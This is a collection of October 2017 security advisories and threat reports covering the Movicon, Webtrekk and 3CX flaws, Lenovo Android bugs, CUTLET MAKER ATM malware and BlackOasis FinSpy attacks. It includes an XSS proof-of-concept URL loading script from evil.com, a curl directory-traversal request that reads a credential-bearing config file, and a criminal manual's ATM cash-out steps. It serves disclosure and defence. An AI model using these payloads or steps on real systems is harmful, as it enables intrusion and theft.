IC3 Issues Alert on DDoS Attacks

Original release date: October 17, 2017

The Internet Crime Complaint Center (IC3) has issued an alert on distributed denial-of-service (DDoS)-for-hire services advertised on criminal forums and marketplaces. Using DDoS attacks to prevent legitimate users from accessing websites or information can lead to serious consequences.

US-CERT encourages users and administrators to review the IC3 Alert for more information and US-CERT’s Alert on Heightened DDoS Threat Posed by Mirai and Other Botnets.


This product is provided subject to this Notification and this Privacy & Use policy.

IC3 Issues Alert on IoT Devices

Original release date: October 17, 2017

In conjunction with National Cyber Security Awareness Month, the Internet Crime Complaint Center (IC3) has issued an alert to individuals and businesses about the security risks involved with the Internet of Things (IoT). IoT refers to the emerging network of devices (e.g., smart TVs, home automation systems) that connect to one another via the Internet, often automatically sending and receiving data. IC3 warns that once a device is compromised, an attacker may take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.

US-CERT encourages individuals and businesses to review the IC3 Alert for more information on IoT vulnerabilities and mitigation techniques.


This product is provided subject to this Notification and this Privacy & Use policy.

Progea Movicon SCADA/HMI

CVSS v3 6.8

ATTENTION: Remotely exploitable/low skill level to exploit.

Vendor: Progea

Equipment: Movicon SCADA/HMI

Vulnerability: Uncontrolled Search Path Element, Unquoted Search Path or Element

AFFECTED PRODUCTS

The following versions of Movicon HMI, an HMI software platform, are affected:

  • Movicon Version 11.5.1181 and prior.

IMPACT

Successful exploitation of these vulnerabilities could allow privilege escalation or arbitrary code execution.

MITIGATION

Progea has not provided an update to address these vulnerabilities. However, Progea has issued a knowledge base article about DLL Hijacking, which can be found at the following location:

http://www.movicon.info/Support/MoviconKB/WebHelp/Knowledgebase/kb000035.htm

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

In addition, ICS-CERT recommends that users take the following measures to protect themselves from social engineering attacks which could lead a user to download a malicious DLL file accidentally:

1.Do not click web links or open unsolicited attachments in email messages.

2.Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.

3.Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploits specifically target these vulnerabilities.

VULNERABILITY OVERVIEW

An uncontrolled search path element vulnerability has been identified, which may allow a remote attacker without privileges to execute arbitrary code in the form of a malicious DLL file.

CVE-2017-14017 has been assigned to this vulnerability. A CVSS v3 base score of 6.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).

An unquoted search path or element vulnerability has been identified, which may allow an authorized local user to insert arbitrary code into the unquoted service path and escalate his or her privileges.

CVE-2017-14019 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been assigned; the CVSS vector string is (AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).

RESEARCHER

Karn Ganeshen reported these vulnerabilities to ICS-CERT.

BACKGROUND

Critical Infrastructure Sectors: Critical Manufacturing, Energy, Food and Agriculture, Transportation Systems, Water and Wastewater Systems

Countries/Areas Deployed: Europe, India, and United States

Company Headquarters Location: Italy

Webtrekk Pixel Tracking Cross Site Scripting

SEC Consult Vulnerability Lab Security Advisory < 20171017-0 >
=======================================================================
title: Cross site scripting
product: Webtrekk Pixel tracking
vulnerable version: v3.24 to v3.40, v4.00 to v4.40, v5.00 to v5.04
fixed version: v3.41, v4.41, v5.05
impact: Medium
homepage: https://www.webtrekk.com/
found: 2017-08-29
by: Malte Batram for
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok – Berlin – Linz – Luxembourg – Montreal – Moscow
Kuala Lumpur – Singapore – Vienna (HQ) – Vilnius – Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
——————-
“Webtrekk Analytics offers an endless range of filter and analysis functions.
Whatever type of site you operate, our analytics tools give you the raw data
you need to dive into your web and app metrics so you can optimise your
digital marketing campaigns.”

Source: https://www.webtrekk.com/en/solutions/analytics/

“At home in Germany, Webtrekk ranks first among professional analytics tools
used by the 1,000 most popular .de domains. All told, Webtrekk has a
22.9 percent market share among providers for the top German domains,
excluding sites that use Google Analytics or have no analytics system.”

Source: https://www.webtrekk.com/en/why-webtrekk/market-leader/

Business recommendation:
————————
The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.

Vulnerability overview/description:
———————————–
1) Cross site scripting vulnerability
The Webtrekk Pixel component, used on many websites to track users, has the
capability to load arbitrary external JavaScript via multiple parameter
combinations. The parameters are parsed from the search-part of the URL.

?wt_overlay=1&wt_reporter=url_for_external_javascript
?wt_heatmap=1&wt_reporter=url_for_external_javascript

The URL specified in the parameter wt_reporter is checked by a Regex that can
be bypassed in different ways.

Proof of concept:
—————–
1) Cross site scripting vulnerability
Example URL:
http://www.example.com/?wt_overlay=1&wt_reporter=report1.webtrekk.com.evil.com/

The example URL leads to the inclusion of the following HTML in the page:
<script language=”javascript” type=”text/javascript”
src=”https://report1.webtrekk.com.evil.com/overlay.pl?
wt_contentId=…”></script>

Regex that checks the URL:
/^(http[s]?:\/\/)?(report\d+|analytics)\.webtrekk\.(com|de).*$/

The .* at the end of the expression allows multiple bypasses:
Subdomain: report1.webtrekk.com.evil.com/
Auth: [email protected]/
NoSlash: report1.webtrekk.com

The last bypass leads to the inclusion of JavaScript from the domain
overlay.pl, which at the time of testing was open to be registered, but has been
registered by Webtrekk for security reasons now.

The vulnerability can also be triggered via cookies. This enables an attacker
to execute JavaScript in the session of the victim anytime the website with
the vulnerable script is visited, after only using the parameters from the
search once to set the cookie values.

Cookie values:
wt_overlay=1; wt_overlayFrame=report1.webtrekk.com.evil.com/;

Vulnerable / tested versions:
—————————–
Latest version v4.3.9 tested:
https://support.webtrekk.com/hc/de/article_attachments/115005882469/Webtrekk_EN_Config_Pixel_v4.3.9.zip

Also found to be vulnerable: 3.2.6, 4.0.5, 4.3.5

The setup for version 5 is different and the static part (tiLoader.min.js)
does not include the vulnerable JavaScript directly. However code similiar to
the overlay functions from version 3 and 4 seems to be loaded dynamically (which
also includes the same Regex check).

According to the vendor, v5 is affected as well.

Vendor contact timeline:
————————
2017-08-30: Contacting vendor through [email protected] & email under “Contact”,
no answer
2017-09-12: Asking for contact again
2017-09-12: Vendor: requests sending the advisory and verifies it internally
2017-09-13: Vendor: optimized validation, fixed in internal version
2017-09-14: Release of patched version and vendor informs their customers
2017-10-17: Coordinated release of security advisory

Solution:
———
Upgrade to the patched versions from the vendor immediately. The following
versions contain better domain validation and fix the issue according to
the vendor:

v3.41, v4.41, v5.05

According to the vendor, the updated versions are available within the
support center on the vendor’s website for all customers and a message that
a security update is available will be shown.

Workaround:
———–
Setting “disableOverlayView: true” in the webtrekkConfig prevents the execution
of the vulnerable code.

Advisory URL:
————-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok – Berlin – Linz – Luxembourg – Montreal – Moscow
Kuala Lumpur – Singapore – Vienna (HQ) – Vilnius – Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/about-us/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Batram / @2017

Lenovo Quietly Patches Massive Bug Impacting Its Android Tablets and Zuk, Vibe Phones

Security experts are urging Lenovo customers to update their Android tablets and handsets to protect themselves against a handful of critical vulnerabilities impacting tens of millions of vulnerable Lenovo devices.

On Oct. 5, Lenovo quietly rolled out four patches impacting all of its Android tablets, Vibe and Zuk phones, and the Moto M (XT1663) and Moto E3 (XT1706) model handsets.

According to Imre Rad, an independent security researcher who identified the bugs, the vulnerabilities are tied to the Lenovo Service Framework (LSF), an Android application used by several other Android applications and which is exclusive to Lenovo devices.

According to Lenovo’s description of LSF, it is used to receive push notifications from Lenovo servers such as product promotions for apps, news, notices, surveys and also to facilitate emergency app repairs and upgrades when needed.

However, Rad found that LSF could also be exploited by attackers to facilitate the downloading of code onto devices from an arbitrary server resulting in remote code execution. The four vulnerabilities found by Rad include:

  • CVE-2017-3758 – Improper access controls on several Android components in the LSF application, which can be exploited to enable remote code execution.
  • CVE-2017-3759 – The LSF Android application accepts some responses from the server without proper validation.  This exposes the application to man-in-the-middle attacks leading to possible remote code execution.
  • CVE-2017-3760 – The LSF Android application uses a set of non-secure credentials when performing integrity verification of downloaded applications and/or data.  This exposes the application to man-in-the-middle attacks leading to possible remote code execution.
  • CVE-2017-3761 – The LSF Android application executes some system commands without proper sanitization of external input. In certain cases, this could lead to command injection, which, in turn, could lead to remote code execution.

“While some devices were impacted, the issues have been patched and updates are available both automatically and manually as indicated in the Security Advisory,” Lenovo told Threatpost.

When asked, Lenovo wouldn’t say what percentage of its more than 20 million Android tablets sold since 2015, according to IDC, have been patched. All its phones have received patches it said. “We take all vulnerabilities seriously. Patches for this are complete and readily available,” a spokesperson said.

Lenovo said it was not aware of any of the vulnerabilities being exploited in the wild.

“Available actions to attackers include changing system settings, executing shell commands or installing additional packages. Malicious actors could abuse the LSF to deploy code components persistently in parts of the flash memory so that the only removal method would be the factory reset,” Rad said.

In the case of CVE-2017-3760, the researcher found the LSF application pulled from remote web services for new system messages. Though the communication was carried out over a cleartext HTTP channel, the server responses were protected by an RSA private key.

“The problem is, the RSA private key that belongs to the public pair that was used for the signature checking, could be found on the internet as part of an example application of a software library,” according to his research. That could allow an adversary on an untrusted network (a rogue Wi-Fi AP or GSM network) to leverage a man-in-the-middle attack where an adversary could intercepted the network connection with a malicious polling message. “They could effectively take over the phone (or Lenovo Android device) remotely,” he said.

Rad said the vulnerabilities were discovered on May 10 and initial disclosure of the bugs to Lenovo was May 14. Ten days later Lenovo confirmed the vulnerabilities with coordinated public disclosure occurring on Oct. 5.

Today’s Predictions for Tomorrow’s Internet

Original release date: October 17, 2017

October is National Cybersecurity Awareness Month, an annual campaign to raise awareness about cybersecurity. Smart cities, connected devices, digitized records, as well as smart cars and homes, have become a new reality. While there are tremendous benefits to this technology, it is critical to understand how to use these cutting-edge innovations in safe and secure ways. The National Cyber Security Alliance has released Online Cybersecurity Advice to help users access digital innovations safely and efficiently.

US-CERT encourages users and administrators to review the following resources:


This product is provided subject to this Notification and this Privacy & Use policy.

ATM malware is being sold on Darknet market

Disclaimer and warning

ATM systems appear to be very secure, but the money can be accessed fairly easily if you know what you are doing. Criminals are exploiting hardware and software vulnerabilities to interact with ATMs, meaning they need to be made more secure. This can be achieved with the help of additional security software, properly configured to stop the execution of non-whitelisted programs on ATMs.

Worryingly, it is very easy to find detailed manuals of ATM malware. Anybody can simply buy them for around 5000 USD on darknet markets.

Introduction

In May 2017, Kaspersky Lab researchers discovered a forum post advertising ATM malware that was targeting specific vendor ATMs. The forum contained a short description of a crimeware kit designed to empty ATMs with the help of a vendor specific API, without interacting with ATM users and their data. The post links to an offer that was initially published on the AlphaBay Darknet marketplace, which was recently taken down by the FBI.

Advertisement post

An offer post on AlphaBay market

The price of the kit was 5000 USD at the time of research. The AlphaBay description includes details such as the required equipment, targeted ATMs models, as well as tips and tricks for the malware’s operation. And part of a detailed manual for the toolkit was also provided.

Screenshot of a description on AlphaBay market

Previously described ATM malware Tyupkin was also mentioned in this text. The manual “Wall ATM Read Me.txt” was distributed as a plain text file, written in poor English and with bad text formatting. The use of slang and grammatical mistakes suggests that this text was most likely written by a native Russian-speaker.

Apart of a manual with text formatting applied

The manual provides a detailed picture, though only a fragment of the complete manual is being shown. There is a description for each step of the dispense process:

Prepare an all tools, all the programs should be placed on a flash disk.
Tools are wireless keyboard, usb hub, usb cable, usb adapter usb a female to b female, Windows 7 laptop or a tablet ( to run code generator) and a drill.
Find an appropriate ATM
Open ATM door and plug into USB port.
Execute Stimulator to see full information of all the ATM cassettes.
Execute CUTLET MAKER to get it is code.
Execute password generator on a tablet or on a laptop and paste CUTLET MAKER code to it, put the result password to CUTLET MAKER.
Dispense the money from chosen cassette.

The manual provides usage descriptions for all parts of the toolset. The list of crimeware from the kit consists of CUTLET MAKER ATM malware, the primary element, with a password generator included and a Stimulator – an application to gather cash cassette statuses of a target ATM. The crimeware kit is a collection of programs possibly written by different authors, though CUTLET MAKER and Stimulator were protected in the same way, c0decalc is a simple terminal-based application without any protection at all.

Delicious cutlet ingredients: CUTLET MAKER, c0decalc and Stimulator

The first sample was named “CUTLET MAKER” by its authors and has been designed to operate the cash dispense process on specific vendor ATMs.

To answer the question of how a cook from the CUTLET MAKER interface and cutlets relate to stealing money from ATMs, we must explain the meaning of the word “Cutlet“. Originally, it means a meat dish, but as a Russian slang term “Cutlet” (котлета) means “a bundle of money”, suggesting that the criminals behind the malware might be native Russian speakers.

The “Cutlet Maker” malware functionality suggests that two people are supposed to be involved in the theft – the roles are called “drop” and “drop master”. Access to the dispense mechanism of CUTLET MAKER is password protected. Though there could be just one person with the c0decalc application needed to generate a password. Either network or physical access to an ATM is required to enter the code in the application text area and also to interact with the user interface.

Stimulator was possibly developed by the same authors. Its purpose is to retrieve and show the status information of specific vendor ATM cash cassettes (such as currency, value and the amount of notes).

CUTLET MAKER and c0decalc

CUTLET MAKER is the main module responsible for dispensing money from the ATM. The sample analysed in this research has the MD5 checksum “fac356509a156a8f11ce69f149198108” and the compilation timestamp Sat Jul 30 20:17:08 2016 UTC.

The program is written in Delphi and was packed with VMProtect, however it is possible that multiple packers might have been used.

Different versions of the main component were found while researching this toolset. The first known submission of the first version sent to a public multiscanner service took place on June 22nd 2016. All submissions discovered by Kaspersky Lab were performed from different countries, with Ukraine being the chronological first country of origin.

Known CUTLET MAKER filenames (according to public multiscanner service information):

cm.vmp.exe
cm15.vmp.exe
cm16F.exe
cm17F.exe

The following version information was captured from the application’s window caption, followed after a “CUTLET MAKER” name. Known versions at the time of research were:

1.0
1.02
1.0 F

The assumed development period is from 2016-06-22 to 2016-08-18, according to the first submission date of the earliest version and the last submission date of the latest version at the time of writing. The application requires a special library to operate, which is part of a proprietary ATM API, controlling the cash dispenser unit.

With all the dependencies in place, the interface shows a code.

CUTLET MAKER challenge code marked with red rectangle

In order to unlock the application, a password from c0decalc generator needs to be entered, thereby answering the given challenge code. If the password is incorrect, the interface won’t react to any further input.

Each “CHECK HEAT” and “start cooking!” button corresponds to a specific ATM cash cassette. Buttons labeled “CHECK HEAT” dispense one note, “start cooking!” dispenses 50 “cutlets” with 60 notes each.  The “Stop!” button stops an ongoing “start cooking!” process. “Reset” is intended to reset the dispense process.

c0decalc a password generator for CUTLET MAKER

This tool is an unprotected command line application, written in Visual C. The purpose of this application is to generate a password for CUTLET MAKER’s graphical interface.

The compilation timestamp for this specific sample is Sun Nov 13 11:35:25 2016 UTC and was first uploaded to a public multiscanner service on December 7th 2016.

Example output for “12345678” input

Kaspersky Lab researchers checked the algorithm during the analysis and found “CUTLET MAKER” working with the passwords generated by “c0decalc”.

Stimulator

The Stimulator sample analysed in this research has the MD5 hash “27640bb7908ca7303d13d50c14ccf669”. This sample is also written in Delphi and packed the same way as “CUTLET MAKER”. The compilation timestamp is Sat Jul 16 18:34:47 2016 UTC.

The application is designed to work on specific vendor ATMs and also uses proprietary API calls.

Some additional symbols were found in the memory dump of a “Stimulator” process, pointing to an interesting part of the application. After execution and pressing the “STIMULATE ME!” button, the proprietary API function is used to fetch an ATM’s cassette status. The following cassette state results are used:

1CUR
2CUR
3CUR
4CUR
1VAL
2VAL
3VAL
4VAL
1NDV
2NDV
3NDV
4NDV
1ACT
2ACT
3ACT
4ACT

Each preceding number is mapped to an ATM cassette. The three character states are interpreted as follows:

nCUR cassette n currency (like “USD”, “RUB”)
nVAL cassette n note value (like 00000005, 00000020 )
nACT cassette n counter for specific notes in a cassette (value from 0 to 3000)
nNDV number of notes in the ATM for cassette n (value from 0 to 3000)

The result of “STIMULATE ME!” button press in proper environment

Each column, shown in the picture above, describes the state of one corresponding ATM cassette.

The background picture used in the application interface turns out to be quite unique, the original photo was posted on a DIY blog:

https://www.oldtownhome.com/2011/8/4/Knock-Knock-Whos-There-Merv-the-Perv/

Original picture as used in “Stimulator” application (photo by Alex Santantonio)

Conclusion

This type of malware does not affect bank customers directly, it is intended for the theft of cash from specific vendor ATMs. CUTLET MAKER and Stimulator show how criminals are using legitimate proprietary libraries and a small piece of code to dispense money from an ATM. Examples of appropriate countermeasures against such attacks include default-deny policies and device control. The first measure prevents criminals from running their own code on the ATM’s internal PC. It is likely that ATMs in these attacks were infected through physical access to the PC, which means criminals were using USB drives to install malware onto the machine. In such a case, device control software would prevent them from connecting new devices, such as USB sticks. Kaspersky Embedded Systems Security will help to extend the security level of ATMs.

Kaspersky Lab products detects this treats as Backdoor.Win32.ATMletcut, Backdoor.Win32.ATMulator, Trojan.Win32.Agent.ikmo

3CX Phone System 15.5.3554.1 Directory Traversal

Title:
======
3CX Phone System – Authenticated Directory Traversal

Author:
=======
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG

CVE-ID:
=======
CVE-2017-15359

Risk Information:
=================
CVSS Base Score: 6.8
CVSS Vector: CVSS3#AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Timeline:
=========
2017-08-08 Vulnerability discovered
2017-08-10 Asked for security contact
2017-08-11 Send details to the vendor
2017-09-04 Vendor has confirmed the vulnerability, will be fixed in the next release
2017-10-16 Public disclosure

Affected Products:
==================
3CX Phone System 15.5.3554.1 (Debian based installation)

Vendor Homepage:
================
https://www.3cx.com/phone-system/download-links/

Details:
========
In the 3CX Phone System 15.5.3554.1, the Management Console typically listens to port 5001 and is prone to a directory traversal attack:
“/api/RecordingList/DownloadRecord?file=” and “/api/SupportInfo?file=” are the vulnerable parameters. An attacker must be authenticated to exploit
this issue to access sensitive information to aid in subsequent attacks.

The vulnerabilities were found during a penetration test.

Proof of Concept:
=================

~$ curl -i -k –cookie “.AspNetCore.Cookies=CfDJ8PTIw(…)” https://192.168.0.1:5001/api/SupportInfo?file=/var/lib/3cxpbx/Instance1/Bin/3CXPhoneSystem.ini
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Aug 2017 13:05:16 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-3CX-Version: 15.5.3554.1
Content-Disposition: attachment; filename=”/var/lib/3cxpbx/Instance1/Bin/3CXPhoneSystem.ini”; filename*=UTF-8”%2Fvar%2Flib%2F3cxpbx%2FInstance1%2FBin%2F3CXPhoneSystem.ini
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15768000

[General]
;connection point to call manager
;used by:
;a) call manager initializes own listener before it connects to configuration server.
;b) components which are working directly with call manager
;MUST NOT be used by components which make connection to configuration server.
;They MUST use CM_API_IP, CM_API_PORT, CM_API_USER and CM_API_PASSWORD paramaeters to make direct connection to CallManagerAPI
pbxSLNIC=127.0.0.1
cmPort=5482
pbxuser=instance_Instance158792
pbxpass=REMOVED
AppPath=/var/lib/3cxpbx/Instance1
AppDataPath=/var/lib/3cxpbx/Instance1
Tenant=Instance1

[ConfService]
;connection point to configuration server for components
confNIC=127.0.0.1
ConfPort=5485
confUser=cfguser_default
confPass=REMOVED

[CfgServerProfile]
;configuration server connection to database
;exclusively used by configuration server
DBHost=127.0.0.1
DBPort=5432
MasterDBUser=phonesystem
MasterDBPassword=REMOVED
MasterTable=phonesystem_mastertable
DefFile=Objects.cls

[QMDatabase]
DBHost=127.0.0.1
DBPort=5432
DBName=database_single
dbUser=logsreader_single
dbPassword=REMOVED

[MIME_TYPES]
MESSAGE=x-chat/control

Fix:
====
Vendor has confirmed the vulnerability, will be fixed in the next release.

BlackOasis APT and new targeted attacks leveraging zero-day exploit

More information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [email protected]

Introduction

Kaspersky Lab has always worked closely with vendors to protect users. As soon as we find new vulnerabilities we immediately inform the vendor in a responsible manner and provide all the details required for a fix.

On October 10, 2017, Kaspersky Lab’s advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware. We have reported the bug to Adobe who assigned it CVE-2017-11292 and released a patch earlier today:

So far only one attack has been observed in our customer base, leading us to believe the number of attacks are minimal and highly targeted.

Analysis of the payload allowed us to confidently link this attack to an actor we track as “BlackOasis”. We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by FireEye in September 2017.  The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.

BlackOasis Background

We first became aware of BlackOasis’ activities in May 2016, while investigating another Adobe Flash zero day. On May 10, 2016, Adobe warned of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.

Kaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi scanner system on May 8, 2016. The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server. Although the exact payload of the attack was no longer in the C&C, the same server was hosting multiple FinSpy installation packages.

Leveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time.  Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively.  These exploit chains also delivered FinSpy installation packages.

Since the discovery of BlackOasis’ exploitation network, we’ve been tracking this threat actor with the purpose of better understanding their operations and targeting and have seen a couple dozen new attacks. Some lure documents used in these attacks are shown below:

Decoy documents used in BlackOasis attacks

To summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:

  • CVE-2015-5119 – June 2015
  • CVE-2016-0984 – June 2015
  • CVE-2016-4117 – May 2016
  • CVE-2017-8759 – Sept 2017
  • CVE-2017-11292 – Oct 2017

Attacks Leveraging CVE-2017-11292

The attack begins with the delivery of an Office document, presumably in this instance via e-mail.  Embedded within the document is an ActiveX object which contains the Flash exploit.

Flash object in the .docx file, stored in uncompressed format

The Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits.

Unpacking routine for SWF exploit

The exploit is a memory corruption vulnerability that exists in the “com.adobe.tvsdk.mediacore.BufferControlParameters” class.  If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode.

The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files:

NOP sled composed of 0x90 and 0x91 opcodes

The main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.

Second stage shellcode

The second stage shellcode will then perform the following actions:

  1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe
  2. Download a lure document to display to the victim from the same IP
  3. Execute the payload and display the lure document

Payload – mo.exe

As mentioned earlier, the “mo.exe” payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of Gamma International’s FinSpy malware, typically sold to nation states and other law enforcement agencies to use in lawful surveillance operations.  This newer variant has made it especially difficult for researchers to analyze the malware due to many added anti-analysis techniques, to include a custom packer and virtual machine to execute code.

The PCODE of the virtual machine is packed with the aplib packer.

Part of packed VM PCODE

After unpacking, the PCODE it will look like the following:

Unpacked PCODE

After unpacking the virtual machine PCODE is then decrypted:

Decrypted VM PCODE

The custom virtual machine supports a total of 34 instructions:

Example of parsed PCODE

In this example, the “1b” instruction is responsible for executing native code that is specified in parameter field.

Once the payload is successfully executed, it will proceed to copy files to the following locations:

  • C:\ProgramData\ManagerApp\AdapterTroubleshooter.exe
  • C:\ProgramData\ManagerApp\15b937.cab
  • C:\ProgramData\ManagerApp\install.cab
  • C:\ProgramData\ManagerApp\msvcr90.dll
  • C:\ProgramData\ManagerApp\d3d9.dll

The “AdapterTroubleshooter.exe” file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique.  The “d3d9.dll” file is malicious and is loaded into memory by the legit binary upon execution.  Once loaded, the DLL will then inject FinSpy into the Winlogon process.

Part of injected code in winlogon process

The payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them used in the past with other FinSpy payloads. Most recently one of these C2 servers was used together with CVE-2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely to the BlackOasis APT cluster of FinSpy activity.

Targeting and Victims

BlackOasis’ interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is also an interest in international activists and think tanks.

Victims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.

Conclusions

We estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools. Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it was in the case of HackingTeam. Additionally, Gamma had two years to recover from the attack and pick up the pace.

We believe the number of attacks relying on FinFisher software, supported by zero day exploits such as the ones described here will continue to grow.

What does it mean for everyone and how to defend against such attacks, including zero-day exploits?

For CVE-2017-11292 and other similar vulnerabilities, one can use the killbit for Flash within their organizations to disable it in any applications that respect it.  Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other necessary resources that rely on Flash and of course, it will not protect against exploits for other third party software.

Deploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can help ensure customers are protected against threats such as this.  Users of Kaspersky products are protected as well against this threat by one of the following detections:</p style=”margin-bottom:0!important”>

  • PDM:Exploit.Win32.Generic
  • HEUR:Exploit.SWF.Generic
  • HEUR:Exploit.MSOffice.Generic

More information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [email protected]

Acknowledgements

We would like to thank the Adobe Product Security Incident Response Team (PSIRT) for working with us to identify and patch this vulnerability.

References

  1. Adobe Bulletin https://helpx.adobe.com/security/products/flash-player/apsb17-32.html

Indicators of compromise

4a49135d2ecc07085a8b7c5925a36c0a
89.45.67[.]107